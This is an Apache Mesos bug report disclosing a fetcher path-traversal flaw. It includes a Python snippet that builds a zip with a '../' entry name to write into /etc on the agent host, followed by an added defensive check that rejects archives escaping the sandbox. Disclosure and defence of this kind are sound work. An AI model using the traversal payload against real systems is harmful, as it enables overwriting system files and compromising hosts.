Mariusz Derela created MESOS-9610:
-------------------------------------
Summary: Fetcher vulnerability - escaping from sandbox
Key: MESOS-9610
URL: https://issues.apache.org/jira/browse/MESOS-9610
Project: Mesos
Issue Type: Bug
Components: fetcher
Affects Versions: 1.7.2
Reporter: Mariusz Derela

I have noticed that there is a possibility to exploit the fetcher and overwrite
any files on the agent host.
Scenario to reproduce:
1) Prepare a file with any content and name the file like "../../../etc/test". We
can use Python and the zipfile module to achieve that:
{code:java}
>>> import zipfile
>>> zip = zipfile.ZipFile("exploit.zip", "w")
>>> zip.writestr("../../../../../../../../../../../../etc/mariusz_was_here.txt",
...     "some content")
>>> zip.close()
{code}
2) Prepare a service that will use our artifact (exploit.zip).
3) Run the service.
At the end, in /etc we will get our file. As you can imagine, there are a lot of
possibilities for how we can use it.
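
A pre-extraction check for the kind of archive described in the report above, as an added example (not Mesos fetcher code and not from the reporter): it resolves every entry name against the sandbox directory and refuses the whole archive if any entry lands outside it. The function names and the sample entry names are hypothetical and constructed for the demo.

```python
import io
import os
import tempfile
import zipfile


def unsafe_members(archive, dest_dir):
    """Return entry names that resolve outside dest_dir when joined to it."""
    root = os.path.realpath(dest_dir)
    bad = []
    for info in archive.infolist():
        name = info.filename.replace("\\", "/")
        target = os.path.realpath(os.path.join(root, name))
        # Absolute names and "../" chains both end up outside root.
        if os.path.isabs(name) or os.path.commonpath([root, target]) != root:
            bad.append(info.filename)
    return bad


def extract_checked(archive, dest_dir):
    """Extract only if every entry stays inside dest_dir; else write nothing."""
    bad = unsafe_members(archive, dest_dir)
    if bad:
        raise ValueError("entries escape %s: %r" % (dest_dir, bad))
    # zipfile.extractall also drops ".." components itself; rejecting first
    # makes the policy explicit instead of silently rewriting names.
    archive.extractall(dest_dir)
    return sorted(os.listdir(dest_dir))


def build_sample(names):
    """Constructed in-memory archive (sample data, not from the report)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in names:
            zf.writestr(n, "some content")
    buf.seek(0)
    return zipfile.ZipFile(buf)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as sandbox:
        archive = build_sample(["data/ok.txt", "../../outside.txt"])
        print("rejected entries:", unsafe_members(archive, sandbox))
        try:
            extract_checked(archive, sandbox)
        except ValueError as exc:
            print("refused:", exc)
```

The check covers entry names only; archives that carry symlink entries need separate handling before extraction.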